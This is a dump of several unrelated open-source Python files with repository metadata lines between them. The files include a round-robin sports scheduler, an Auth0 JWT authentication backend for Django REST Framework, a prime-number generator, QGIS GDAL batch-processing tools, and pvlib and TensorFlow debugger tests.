print("rho euler tri perturbed l2: "+str(log(rl2_euler_tri_pert[1]/rl2_euler_tri_pert[2])/log(dx_pert[1]/dx_pert[2])))
print("rho euler tri limited l2: "+str(log(rl2_euler_tri_limited[2]/rl2_euler_tri_limited[3])/log(dx_tri[2]/dx_tri[3])))
print("rho euler lp tri limited l2: "+str(log(rl2_euler_lp_tri_limited[1]/rl2_euler_lp_tri_limited[2])/log(dx_tri[1]/dx_tri[2])))
print("rho euler limited l2: "+str(log(rl2_euler_limited[2]/rl2_euler_limited[3])/log(dx[2]/dx[3])))
print("rho euler lp limited l2: "+str(log(rl2_euler_lp_limited[2]/rl2_euler_lp_limited[3])/log(dx[2]/dx[3])))
print("rho ns l2: "+str(log(rl2_ns[0]/rl2_ns[1])/log(dx[0]/dx[1])))
print("rho ns end l2: "+str(log(rl2_ns[2]/rl2_ns[3])/log(dx[2]/dx[3])))
print("rho ns fp l2: "+str(log(rl2_ns_fp[0]/rl2_ns_fp[1])/log(dx_fp[0]/dx_fp[1])))
print("rho ns fp end l2: "+str(log(rl2_ns_fp[3]/rl2_ns_fp[4])/log(dx_fp[3]/dx_fp[4])))
plt.figure()
hlines = plt.loglog(dx, rl2_euler, dx, rl2_ns, dx, rl2_euler_limited, dx, rl2_euler_lp_limited, dx_tri, rl2_euler_tri, dx_tri, rl2_euler_tri_limited, dx_pert[0:3], rl2_euler_tri_pert[0:3], dx_fp, rl2_ns_fp)
plt.rc('text', usetex=True)
plt.xlabel("Grid size")
plt.ylabel("$L_2$ error")
plt.legend(hlines, ["euler", "NS manufactured", "euler scalar limited", "euler lp limited", "euler tri", "euler tri limited", "euler tri pert", "NS flat plate"])
plt.grid(True,which="both")
plt.show()
|
Aloomaio/googleads-python-lib
|
examples/ad_manager/v201811/proposal_service/submit_proposals_for_approval.py
|
Python
|
apache-2.0
| 2,333
| 0.00943
|
#!/usr/bin/env python
#
# Copyright 2015 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""This code example approves a single proposal.
To determine which proposals exist, run get_all_proposals.py.
"""
# Import appropriate modules from the client library.
from googleads import ad_manager
PROPOSAL_ID = 'INSERT_PROPOSAL_ID_HERE'
def main(client, proposal_id):
# Initialize appropriate service.
proposal_service = client.GetService('ProposalService', version='v201811')
# Create query.
statement = (ad_manager.StatementBuilder(version='v201811')
.Where('id = :proposalId')
.WithBindVariable('proposalId', proposal_id))
proposals_approved = 0
# Get proposals by statement.
while True:
response = proposal_service.getProposalsByStatement(statement.ToStatement())
if 'results' in response and len(response['results']):
# Display results.
for proposal in response['results']:
print ('Proposal with id "%s", name "%s", and status "%s" will be'
' approved.' % (proposal['id'], proposal['name'],
proposal['status']))
# Perform action.
result = proposal_service.performProposalAction(
{'xsi_type': 'SubmitProposalsForApproval'}, statement.ToStatement())
if result and int(result['numChanges']) > 0:
proposals_approved += int(result['numChanges'])
statement.offset += statement.limit
else:
break
# Display results.
if proposals_approved > 0:
    print('\nNumber of proposals approved: %s' % proposals_approved)
  else:
    print('\nNo proposals were approved.')
if __name__ == '__main__':
# Initialize client object.
ad_manager_client = ad_manager.AdManagerClient.LoadFromStorage()
main(ad_manager_client, PROPOSAL_ID)
|
openannotation/annotateit
|
console.py
|
Python
|
agpl-3.0
| 306
| 0.009804
|
from IPython import embed
import annotateit
from annotateit import model, db, es
from flask import g
def main():
app = annotateit.create_app()
with app.test_request_context():
g.user = model.User.fetch('admin')
embed(display_banner=False)
if __name__ == '__main__':
main()
|
happy5214/competitions-scheduler
|
competitions/scheduler/roundrobin.py
|
Python
|
lgpl-3.0
| 9,367
| 0.000641
|
# -*- coding: utf-8 -*-
"""Round-robin scheduling."""
# Copyright (C) 2015 Alexander Jones
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License as published
# by the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
from __future__ import print_function, unicode_literals
import copy
import random
from . import NoMatchFound, ScheduleGenerationFailed
from .scheduler import Scheduler
class RoundRobinScheduler(Scheduler):
"""A standard round-robin scheduler."""
def __init__(self, teams, meetings=0):
"""Constructor.
@param teams: A list of teams or the number of teams
@type teams: list or int
@param meetings: The number of times teams meet each other
@type meetings: int
"""
if not isinstance(teams, list):
teams = list(range(1, teams + 1))
if len(teams) % 2 == 1:
teams.append(None)
self.teams = teams
self.meetings = meetings
@property
def match_count(self):
"""The number of matches per round."""
return int(len(self.teams) / 2)
@property
def round_count(self):
"""The number of rounds in a season."""
return int((len(self.teams) - 1) * self.meetings)
@property
def home_teams(self):
"""The "home" teams from the previous schedule generation."""
if hasattr(self, '_home_teams'):
return tuple(self._home_teams)
else:
return ()
def _generate_home_teams(self, home_teams=None):
"""Generate the list of home teams for a matrix."""
team_count = len(self.teams) # Number of teams
odd_team_count = None in self.teams # Whether there is a blank placeholder
if not home_teams: # Randomly select home teams
if odd_team_count:
home_count = (team_count - 1) // 2
homes = random.sample(range(team_count - 1), home_count)
homes.append(team_count - 1) # Spacer is always home
else:
home_count = team_count // 2
homes = random.sample(range(team_count), home_count)
self._home_teams = [self.teams[i] for i in homes]
else: # if home_teams. Use provided teams.
self._home_teams = home_teams
homes = [self.teams.index(home) for home in home_teams]
return homes
def generate_matrix(self, home_teams=None):
"""Generate a schedule matrix for odd meeting counts."""
team_count = len(self.teams) # Number of teams
home_at_home = team_count // 2 # "Home" teams have ceiling(half) of their matches at home
away_at_home = (team_count - 1) // 2 # "Away" teams have floor(half) at home
odd_team_count = None in self.teams # Whether there is a blank placeholder
homes = self._generate_home_teams(home_teams)
matrix = [[None] * team_count for __ in range(team_count)]
for i in range(team_count - 1):
home_team = i in homes # Whether the team is a home team
home_count = (away_at_home
if not home_team or odd_team_count else home_at_home)
home_count -= matrix[i].count(True) # Check previously assigned match pairings
try:
if odd_team_count:
home_opps = random.sample(list(range(i + 1, team_count - 1)),
home_count)
if home_team:
home_opps.append(team_count - 1)
else:
home_opps = random.sample(list(range(i + 1, team_count)),
home_count)
for opp in range(i + 1, team_count):
is_home = opp in home_opps
matrix[i][opp] = is_home
matrix[opp][i] = not is_home
except ValueError: # Recurse
return self.generate_matrix(home_teams=home_teams)
return matrix
def _generate_even_matches(self, evens):
"""Generate a list of matches for even meeting counts."""
return [(team, opp)
for team in self.teams
for opp in self.teams
if team != opp] * evens
def _generate_odd_matches(self, home_teams=None):
"""Generate a list of matches for odd meeting counts."""
matrix = self.generate_matrix(home_teams=home_teams)
matches = []
for team_idx in range(len(self.teams)):
for opp_idx in range(team_idx + 1, len(self.teams)):
if matrix[team_idx][opp_idx]:
matches.append((self.teams[team_idx],
self.teams[opp_idx]))
else:
matches.append((self.teams[opp_idx],
self.teams[team_idx]))
return matches
def generate_matches(self, home_teams=None):
"""Generate the matches for the season.
@return: The matches to schedule
@rtype: list
"""
is_odd = self.meetings % 2 == 1
evens = self.meetings // 2
matches = self._generate_even_matches(evens) if evens > 0 else []
if is_odd:
matches.extend(self._generate_odd_matches(home_teams))
return matches
def generate_round(self, matches):
"""Generate a round.
@param matches: The generated matches
@type matches: list
@return: The generated round
@rtype: list
"""
round = []
try:
random.shuffle(matches)
round.append(matches.pop(0))
poss = copy.copy(matches)
for __ in range(1, self.match_count):
match = Scheduler.find_unique_match(round, poss)
round.append(match)
matches.remove(match)
return round
except NoMatchFound:
matches.extend(round)
return None
def _generate_schedule_round(self, matches):
"""Fully generate a round for a schedule."""
for ___ in range(10):
next_round = self.generate_round(matches)
if next_round:
return next_round
else:
raise ScheduleGenerationFailed('Schedule generation failed.')
def generate_schedule(self, try_once=False, home_teams=None):
"""Generate the schedule.
@param try_once: Whether to only try once to generate a schedule
@type try_once: bool
@return: The generated schedule
@rtype: list of lists of tuples
@raise RuntimeError: Failed to create schedule within limits
"""
rounds = []
matches = self.generate_matches(home_teams=home_teams)
try:
for __ in range(self.round_count):
rounds.append(self._generate_schedule_round(matches))
except ScheduleGenerationFailed as ex:
if try_once:
raise ex
else:
return self.generate_schedule(try_once, home_teams)
return rounds
# Aliases for common meeting counts
class SingleRoundRobinScheduler(RoundRobinScheduler):
"""A standard single round-robin scheduler.
This is an alias of RoundRobinScheduler, with meetings=1.
"""
def __init__(self, teams):
"""Constructor.
@param teams: A list of teams or the number of teams
@type teams: list or int
"""
super(SingleRoundRobinScheduler, self).__init__(teams, meetings=1)
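A usage sketch for the schedulers above; the team names and counts are arbitrary:

# Illustrative: a home-and-away (double) round robin for four teams.
scheduler = RoundRobinScheduler(["A", "B", "C", "D"], meetings=2)
schedule = scheduler.generate_schedule()
assert len(schedule) == scheduler.round_count                      # 6 rounds
assert all(len(rnd) == scheduler.match_count for rnd in schedule)  # 2 matches per round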
class DoubleRoundRobinScheduler(RoundRobinScheduler):
"""
|
ChrisLR/Python-Roguelike-Template
|
bodies/blood/base.py
|
Python
|
mit
| 178
| 0.005618
|
class Blood(object):
uid = "blood"
name = "Blood"
"""
    Most characters will have ordinary blood, but some could have acidic blood or blood with other
    properties.
"""
|
mcueto/djangorestframework-auth0
|
rest_framework_auth0/authentication.py
|
Python
|
mit
| 6,383
| 0.000783
|
import logging
from django.contrib.auth.backends import (
RemoteUserBackend,
get_user_model,
)
from django.contrib.auth.models import (
Group,
)
from django.utils.translation import ugettext as _
from rest_framework import exceptions
from rest_framework_auth0.settings import (
auth0_api_settings,
)
from rest_framework_auth0.utils import (
get_auth_token,
get_client_setting,
get_groups_from_payload,
decode_auth_token,
)
from rest_framework.authentication import (
BaseAuthentication,
)
get_username_from_payload = auth0_api_settings.GET_USERNAME_HANDLER
logger = logging.getLogger(__name__)
class Auth0JSONWebTokenAuthentication(BaseAuthentication, RemoteUserBackend):
"""
Clients should authenticate by passing the token key in the "Authorization"
HTTP header, prepended with the string specified in the setting
`AUTH_HEADER_PREFIX`. For example:
Authorization: JWT eyJhbGciOiAiSFMyNTYiLCAidHlwIj
By default, the ``authenticate_credentials`` method creates ``User`` objects for
usernames that don't already exist in the database. Subclasses can disable
this behavior by setting the ``create_unknown_user`` attribute to
``False``.
"""
www_authenticate_realm = 'api'
# Create a User object if not already in the database?
create_unknown_user = True
def authenticate(self, request):
"""
You should pass a header of your request: clientcode: web
This function initialize the settings of JWT with the specific client's informations.
"""
client = None
payload = None
logger.debug("authenticating user using Auth0JSONWebTokenAuthentication")
client = get_client_setting(request)
auth_token = get_auth_token(request)
if auth_token is None:
return None
payload = decode_auth_token(
client=client,
auth_token=auth_token
)
# Add request param to authenticated_credentials() call
user = self.authenticate_credentials(request, payload)
return (user, payload)
def authenticate_credentials(self, request, payload):
"""
Returns an active user that matches the payload's user id and email.
"""
UserModel = get_user_model()
remote_user = get_username_from_payload(payload)
if not remote_user:
msg = _('Invalid payload.')
logger.info(
"{message}".format(
message=msg
)
)
raise exceptions.AuthenticationFailed(msg)
# RemoteUserBackend behavior:
# return
user = None
if auth0_api_settings.REPLACE_PIPE_FOR_DOTS_IN_USERNAME:
username = self.clean_username(remote_user)
else:
username = remote_user
logger.debug(
"username = {username}".format(
username=username
)
)
if self.create_unknown_user:
user, created = UserModel._default_manager.get_or_create(**{
UserModel.USERNAME_FIELD: username
})
if created:
user = self.configure_user(request, user)
else:
try:
user = UserModel._default_manager.get_by_natural_key(username)
except UserModel.DoesNotExist:
msg = _('Invalid signature.')
raise exceptions.AuthenticationFailed(msg)
# RemoteUserBackend behavior:
# pass
user = self.configure_user_permissions(user, payload)
return user if self.user_can_authenticate(user) else None
def authenticate_header(self, request):
"""
Return a string to be used as the value of the `WWW-Authenticate`
header in a `401 Unauthenticated` response, or `None` if the
authentication scheme should return `403 Permission Denied` responses.
"""
return '{0} realm="{1}"'.format(
auth0_api_settings.AUTH_HEADER_PREFIX,
self.www_authenticate_realm
)
def configure_user_permissions(self, user, payload):
"""
        Validate whether AUTHORIZATION_EXTENSION is enabled (defaults to False).
        If AUTHORIZATION_EXTENSION is enabled, create and associate groups
        with the current user (the user of the token).
"""
if auth0_api_settings.AUTHORIZATION_EXTENSION:
logger.debug(
"Using Auth0 Authorization Extension"
)
logger.debug(
"Clearing groups for user: {username}".format(
username=user.username
)
)
user.groups.clear()
try:
logger.debug(
"Getting groups from payload"
)
groups = get_groups_from_payload(payload)
logger.debug(
"Groups: {groups}".format(
groups=groups
)
)
except Exception: # No groups where defined in Auth0?
logger.warning(
"No groups were defined for user: {username}".format(
username=user.username
)
)
return user
for user_group in groups:
group, created = Group.objects.get_or_create(name=user_group)
logger.debug(
"Associating group {group} with user {username}".format(
group=group,
username=user.username
)
)
user.groups.add(group)
return user
def clean_username(self, username):
"""
Cleans the "username" prior to using it to get or create the user object.
Returns the cleaned username.
Auth0 default username (user_id) field returns, e.g. auth0|123456789...xyz
which contains illegal characters ('|').
"""
logger.debug("Cleaning username")
username = username.replace('|', '.')
logger.debug(
"Clean username: {username}".format(
username=username
)
)
return username
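Typical wiring in a Django settings module (a sketch; the dotted path follows this file's location, and the package's other required settings are not shown here):

# settings.py (sketch) -- route DRF authentication through the class above.
REST_FRAMEWORK = {
    'DEFAULT_AUTHENTICATION_CLASSES': [
        'rest_framework_auth0.authentication.Auth0JSONWebTokenAuthentication',
    ],
}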
|
rubennj/pvlib-python
|
pvlib/test/test_atmosphere.py
|
Python
|
bsd-3-clause
| 1,611
| 0.017381
|
import logging
pvl_logger = logging.getLogger('pvlib')
import datetime
import numpy as np
import pandas as pd
from nose.tools import raises
from nose.tools import assert_almost_equals
from pvlib.location import Location
from pvlib import solarposition
from pvlib import atmosphere
# setup times and location to be tested.
times = pd.date_range(start=datetime.datetime(2014,6,24),
                      end=datetime.datetime(2014,6,26), freq='1Min')
tus = Location(32.2, -111, 'US/Arizona', 700)
times_localized = times.tz_localize(tus.tz)
ephem_data = solarposition.get_solarposition(times, tus)
# need to add physical tests instead of just functional tests
def test_pres2alt():
atmosphere.pres2alt(100000)
def test_alt2press():
atmosphere.pres2alt(1000)
# two functions combined will generate unique unit tests for each model
def test_airmasses():
models = ['simple', 'kasten1966', 'youngirvine1967', 'kastenyoung1989',
'gueymard1993', 'young1994', 'pickering2002', 'invalid']
for model in models:
yield run_airmass, ephem_data['zenith'], model
def run_airmass(zenith, model):
atmosphere.relativeairmass(zenith, model)
def test_absoluteairmass():
relative_am = atmosphere.relativeairmass(ephem_data['zenith'], 'simple')
atmosphere.absoluteairmass(relative_am)
atmosphere.absoluteairmass(relative_am, pressure=100000)
def test_absoluteairmass_numeric():
atmosphere.absoluteairmass(2)
def test_absoluteairmass_nan():
np.testing.assert_equal(np.nan, atmosphere.absoluteairmass(np.nan))
|
deniscostadsc/regex-tutorial
|
17-exercises/01-ponto/regex.py
|
Python
|
mit
| 282
| 0
|
'''
In this exercise you must match lines that contain 'tio', but with one character
before it.
To practice, use the '.' (dot).
'''
import re
import sys
REGEX = r''
lines = sys.stdin.readlines()
for line in lines:
if re.search(REGEX, line):
print(line.replace('\n', ''))
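# --- Possible answer (illustration only; the exercise above leaves REGEX empty) ---
# '.' matches any single character, so r'.tio' only matches 'tio' when at least
# one character comes right before it. A quick self-contained check of the idea:
import re as _re_demo
assert _re_demo.search(r'.tio', 'patio') is not None   # 'a' precedes 'tio'
assert _re_demo.search(r'.tio', 'tio') is None          # nothing precedes 'tio'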
|
natabbotts/math-prog-club
|
prime.py
|
Python
|
mit
| 1,686
| 0.007711
|
import heapq, itertools
def factorisation(number):
"""Returns a list of the prime factors of a number in ascending order."""
factors = []
while number > 1:
for factor in range(2, number + 1):
if number % factor == 0:
factors.append(factor)
# floor division needed to return an int
# required because range() needs integer values
number //= factor
break
return factors
def primes(limit = None):
""" Generator yielding primes below (optional) limit."""
if limit is None:
return _infinite_primes()
else:
return itertools.takewhile(lambda x: x < limit, _infinite_primes())
def _infinite_primes():
"""A generator for infinite primes."""
# priority queue of the sequences of non-primes
# the priority queue allows us to get the "next" non-prime quickly
nonprimes = []
i = 2
while True:
if nonprimes and i == nonprimes[0][0]: # non-prime
while nonprimes[0][0] == i:
# for each sequence that generates this number,
# have it go to the next number (simply add the prime)
# and re-position it in the priority queue
                x = nonprimes[0]
x[0] += x[1]
heapq.heapreplace(nonprimes, x)
else: # prime
# insert a 2-element list into the priority queue:
# [current multiple, prime]
# the first element allows sorting by value of current multiple
            # we start with i^2
heapq.heappush(nonprimes, [i*i, i])
yield i
i += 1
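# --- Usage sketch (illustration only; not part of the original prime.py) -----
# factorisation() returns the prime factors with multiplicity in ascending
# order, and primes(limit) lazily yields primes below the limit via the
# heap-based incremental sieve implemented above.
assert factorisation(360) == [2, 2, 2, 3, 3, 5]
assert list(primes(20)) == [2, 3, 5, 7, 11, 13, 17, 19]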
|
oktayuyar/Velespi
|
profiles/urls.py
|
Python
|
gpl-3.0
| 328
| 0.006098
|
from django.conf.urls import url
from profiles import views
urlpatterns = [
url(r"users$", views.UserList.as_view(),
name="api-user-list"),
    url(r"user/(?P<pk>[0-9]+)$", views.UserSingle.as_view(),
        name="api-review-list"),
url(r"userlogin$", views.UserLogin.as_view(),
name="api-login"),
]
|
camptocamp/QGIS
|
python/plugins/GdalTools/tools/widgetBatchBase.py
|
Python
|
gpl-2.0
| 5,310
| 0.030697
|
# -*- coding: utf-8 -*-
"""
***************************************************************************
widgetBatchBase.py
---------------------
Date : June 2010
Copyright : (C) 2010 by Giuseppe Sucameli
Email : brush dot tyler at gmail dot com
***************************************************************************
* *
* This program is free software; you can redistribute it and/or modify *
* it under the terms of the GNU General Public License as published by *
* the Free Software Foundation; either version 2 of the License, or *
* (at your option) any later version. *
* *
***************************************************************************
"""
__author__ = 'Giuseppe Sucameli'
__date__ = 'June 2010'
__copyright__ = '(C) 2010, Giuseppe Sucameli'
# This will get replaced with a git SHA1 when you do a git archive
__revision__ = '$Format:%H$'
from PyQt4.QtCore import *
from PyQt4.QtGui import *
from qgis.core import *
from qgis.gui import *
from widgetPluginBase import GdalToolsBasePluginWidget as BasePluginWidget
import GdalTools_utils as Utils
class GdalToolsBaseBatchWidget(BasePluginWidget):
def __init__(self, iface, commandName):
BasePluginWidget.__init__(self, iface, commandName)
def getBatchArguments(self, inFile, outFile = None):
arguments = []
arguments.extend( self.getArguments() )
arguments.append( inFile )
if outFile != None:
arguments.append(outFile)
return arguments
def isBatchEnabled(self):
return False
def isRecursiveScanEnabled(self):
return False
def setProgressRange(self, maximum):
pass
def updateProgress(self, value, maximum):
pass
def getBatchOutputFileName(self, fn):
inDir = self.getInputFileName()
outDir = self.getOutputFileName()
# if overwrites existent files
if outDir == None or outDir == inDir:
return fn + ".tmp"
return outDir + fn[len(inDir):]
def onRun( self ):
if not self.isBatchEnabled():
BasePluginWidget.onRun(self)
return
self.batchRun()
def batchRun(self):
self.base.enableRun( False )
self.base.setCursor( Qt.WaitCursor )
inDir = self.getInputFileName()
self.inFiles = Utils.getRasterFiles( inDir, self.isRecursiveScanEnabled() )
self.outFiles = []
for f in self.inFiles:
self.outFiles.append( self.getBatchOutputFileName( f ) )
self.errors = []
self.batchIndex = 0
self.batchTotal = len( self.inFiles )
self.setProgressRange( self.batchTotal )
self.runItem( self.batchIndex, self.batchTotal )
def runItem(self, index, total):
self.updateProgress(index, total)
if index >= total:
self.batchFinished()
return
outFile = None
if len(self.outFiles) > index:
outFile = self.outFiles[ index ]
args = self.getBatchArguments( self.inFiles[index], outFile )
self.base.refreshArgs(args)
BasePluginWidget.onRun(self)
def onFinished(self, exitCode, status):
if not self.isBatchEnabled():
BasePluginWidget.onFinished(self, exitCode, status)
return
msg = bytes.decode( bytes( self.base.process.readAllStandardError() ) )
if msg != '':
self.errors.append( ">> " + self.inFiles[self.batchIndex] + "<br>" + msg.replace( "\n", "<br>" ) )
self.base.process.close()
# overwrite existent files
inDir = self.getInputFileName()
outDir = self.getOutputFileName()
if outDir == None or inDir == outDir:
oldFile = QFile( self.inFiles[self.batchIndex] )
newFile = QFile( self.outFiles[self.batchIndex] )
if oldFile.remove():
newFile.rename(self.inFiles[self.batchIndex])
self.batchIndex += 1
      self.runItem( self.batchIndex, self.batchTotal )
def batchFinished( self ):
self.base.stop()
if len(self.errors) > 0:
msg = u"Processing of the following files ended with error: <br><br>" + "<br><br>".join( self.errors )
        QErrorMessage( self ).showMessage( msg )
inDir = self.getInputFileName()
outDir = self.getOutputFileName()
if outDir == None or inDir == outDir:
self.outFiles = self.inFiles
# load layers managing the render flag to avoid waste of time
canvas = self.iface.mapCanvas()
previousRenderFlag = canvas.renderFlag()
canvas.setRenderFlag( False )
notCreatedList = []
for item in self.outFiles:
fileInfo = QFileInfo( item )
if fileInfo.exists():
if self.base.loadCheckBox.isChecked():
self.addLayerIntoCanvas( fileInfo )
else:
notCreatedList.append( item )
canvas.setRenderFlag( previousRenderFlag )
if len( notCreatedList ) == 0:
QMessageBox.information( self, self.tr( "Finished" ), self.tr( "Operation completed." ) )
else:
QMessageBox.warning( self, self.tr( "Warning" ), self.tr( "The following files were not created: \n{0}" ).format( ', '.join( notCreatedList ) ) )
|
steven-cutting/latinpigsay
|
test.py
|
Python
|
mit
| 636
| 0
|
# -*- coding: utf-8 -*-
__title__ = 'latinpigsay'
__license__ = 'MIT'
__author__ = 'Steven Cutting'
__author_email__ = 'steven.c.projects@gmail.com'
__created_on__ = '12/7/2014'
if __name__ == "__main__":
from tests import testscript as ts
from tests import contstests
from latinpigsay.tmp.experiments import exp
from data.text import samples as sam
from latinpigsay import latinpig as lp
from latinpigsay import piggyprint as pp
import sys
import logging
    logging.basicConfig(filename='tests.log')
testtorun = sys.argv[1]
if testtorun == 'contspara':
contstests.contsparatest()
|
quantumlib/OpenFermion-FQE
|
src/fqe/fqe_ops/fqe_ops_utils.py
|
Python
|
apache-2.0
| 2,752
| 0
|
# Copyright 2020 Google LLC
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Utility functions for FQE operators."""
import re
def validate_rdm_string(ops: str) -> str:
"""Check that a string for rdms are valid.
Args:
        ops (str): String expression to be computed.
Returns
(str): Either 'element' or 'tensor'.
"""
qftops = ops.split()
nops = len(qftops)
    assert (nops % 2) == 0
if any(char.isdigit() for char in ops):
creation = re.compile(r"^[0-9]+\^$")
annihilation = re.compile(r"^[0-9]+$")
ncre = 0
nani = 0
for opr in qftops:
if creation.match(opr):
ncre += 1
elif annihilation.match(opr):
nani += 1
else:
raise TypeError("Unsupported behavior for {}".format(ops))
assert nani == ncre
return "element"
creation = re.compile(r"^[a-z]\^$")
annihilation = re.compile(r"^[a-z]$")
ncre = 0
nani = 0
for opr in qftops:
if creation.match(opr):
ncre += 1
elif annihilation.match(opr):
nani += 1
else:
            raise TypeError("Unsupported behavior for {}.".format(ops))
if nani != ncre:
raise ValueError("Unequal creation and annihilation operators.")
return "tensor"
def switch_broken_symmetry(string: str) -> str:
"""Convert the string passed in to the desired symmetry.
Args:
string (str): Input string in the original expression.
Returns:
(str): Output string in the converted format.
"""
new = ""
if any(char.isdigit() for char in string):
work = string.split()
creation = re.compile(r"^[0-9]+\^$")
annihilation = re.compile(r"^[0-9]+$")
for opr in work:
if creation.match(opr):
if int(opr[:-1]) % 2:
val = opr[:-1]
else:
val = opr
elif annihilation.match(opr):
if int(opr) % 2:
val = opr + "^"
else:
val = opr
new += val + " "
else:
new = string
return new.rstrip()
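# --- Usage sketch (illustration only; not part of the original module) -------
# validate_rdm_string() classifies an operator string: numeric indices give
# 'element', letter labels give 'tensor'. switch_broken_symmetry() adds or
# removes daggers on odd (beta) spin-orbital indices.
assert validate_rdm_string('0^ 1') == 'element'
assert validate_rdm_string('i^ j') == 'tensor'
assert switch_broken_symmetry('0^ 1') == '0^ 1^'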
|
maartenq/pcrunner
|
tests/test_configuration.py
|
Python
|
isc
| 1,602
| 0
|
# tests/test_configuration.py
# vim: ai et ts=4 sw=4 sts=4 ft=python fileencoding=utf-8
from io import StringIO
from pcrunner.configuration import (
read_check_commands,
read_check_commands_txt,
read_check_commands_yaml,
)
def test_read_check_commands_txt_with_extra_lines():
fd = StringIO(
u'''SERVICE|CHECK_01|check_dummy.py|0 OK -s 0
SERVICE|CHECK_02|check_dummy.py|1 WARNING -s 10
'''
)
assert read_check_commands_txt(fd) == [
{
'command': u'check_dummy.py 0 OK -s 0',
            'name': u'CHECK_01',
'result_type': 'PROCESS_SERVICE_CHECK_RESULT',
},
{
'command': u'check_dummy.py 1 WARNING -s 10',
'name': u'CHECK_02',
'result_type': 'PROCESS_SERVICE_CHECK_RESULT',
},
]
def test_read_check_commands_yaml():
fd = StringIO(
u'''
- name: 'CHECK_01'
command: 'check_dummy.py 0 OK -s 0'
result_type: 'PROCESS_SERVICE_CHECK_RESULT'
- name: 'CHECK_02'
command: 'check_dummy.py 1 WARNING -s 10'
result_type: 'PROCESS_SERVICE_CHECK_RESULT'
'''
)
assert read_check_commands_yaml(fd) == [
{
'command': u'check_dummy.py 0 OK -s 0',
'name': u'CHECK_01',
'result_type': 'PROCESS_SERVICE_CHECK_RESULT',
},
{
'command': u'check_dummy.py 1 WARNING -s 10',
'name': u'CHECK_02',
'result_type': 'PROCESS_SERVICE_CHECK_RESULT',
},
]
def test_read_check_commands_returns_empty_list():
assert read_check_commands('/does/not/exists') == []
|
wangyum/tensorflow
|
tensorflow/python/debug/lib/stepper_test.py
|
Python
|
apache-2.0
| 45,190
| 0.012304
|
# Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Unit tests of the tfdbg Stepper."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from tensorflow.python.client import session
from tensorflow.python.debug.lib.stepper import NodeStepper
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import ops
from tensorflow.python.framework import test_util
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import math_ops
from tensorflow.python.ops import state_ops
from tensorflow.python.ops import variables
from tensorflow.python.platform import googletest
from tensorflow.python.training import gradient_descent
class StepperTest(test_util.TensorFlowTestCase):
def setUp(self):
self.a = variables.Variable(2.0, name="a")
self.b = variables.Variable(3.0, name="b")
self.c = math_ops.multiply(self.a, self.b, name="c") # Should be 6.0.
self.d = math_ops.multiply(self.a, self.a, name="d") # Should be 4.0.
self.e = math_ops.multiply(self.d, self.c, name="e") # Should be 24.0.
self.f_y = constant_op.constant(0.30, name="f_y")
self.f = math_ops.div(self.b, self.f_y, name="f") # Should be 10.0.
    # The three nodes x, y and z form a graph with "cross-links" in it. I.e., x
# and y are both direct inputs to z, but x is also a direct input to y.
self.x = variables.Variable(2.0, name="x") # Should be 2.0
self.y = math_ops.negative(self.x, name="y") # Should be -2.0.
self.z = math_ops.multiply(self.x, self.y, name="z") # Should be -4.0.
self.sess = session.Session()
|
self.sess.run(variables.global_variables_initializer())
def tearDown(self):
ops.reset_default_graph()
  def testContToFetchNotInTransitiveClosureShouldError(self):
with NodeStepper(self.sess, "e:0") as stepper:
sorted_nodes = stepper.sorted_nodes()
self.assertEqual(7, len(sorted_nodes))
self.assertLess(sorted_nodes.index("a"), sorted_nodes.index("a/read"))
self.assertLess(sorted_nodes.index("b"), sorted_nodes.index("b/read"))
self.assertLess(sorted_nodes.index("a"), sorted_nodes.index("c"))
self.assertLess(sorted_nodes.index("b"), sorted_nodes.index("c"))
self.assertLess(sorted_nodes.index("a"), sorted_nodes.index("d"))
self.assertLess(sorted_nodes.index("d"), sorted_nodes.index("e"))
self.assertLess(sorted_nodes.index("c"), sorted_nodes.index("e"))
self.assertSetEqual(
{"e:0", "d:0", "c:0", "a/read:0", "b/read:0", "b:0", "a:0"},
set(stepper.closure_elements()))
with self.assertRaisesRegexp(
ValueError,
"Target \"f:0\" is not in the transitive closure for the fetch of "
"the stepper"):
stepper.cont("f:0")
def testContToNodeNameShouldReturnTensorValue(self):
with NodeStepper(self.sess, "e:0") as stepper:
self.assertAllClose(6.0, stepper.cont("c"))
def testUsingNamesNotUsingIntermediateTensors(self):
with NodeStepper(self.sess, "e:0") as stepper:
# The first cont() call should have used no feeds.
result = stepper.cont("c:0")
self.assertAllClose(6.0, result)
self.assertItemsEqual(["a/read:0", "b/read:0"],
stepper.intermediate_tensor_names())
self.assertAllClose(2.0, stepper.get_tensor_value("a/read:0"))
self.assertAllClose(3.0, stepper.get_tensor_value("b/read:0"))
self.assertEqual({}, stepper.last_feed_types())
# The second cont() call should have used the tensor handle from the
# previous cont() call.
result = stepper.cont("e:0")
self.assertAllClose(24.0, result)
self.assertItemsEqual(["a/read:0", "b/read:0", "d:0"],
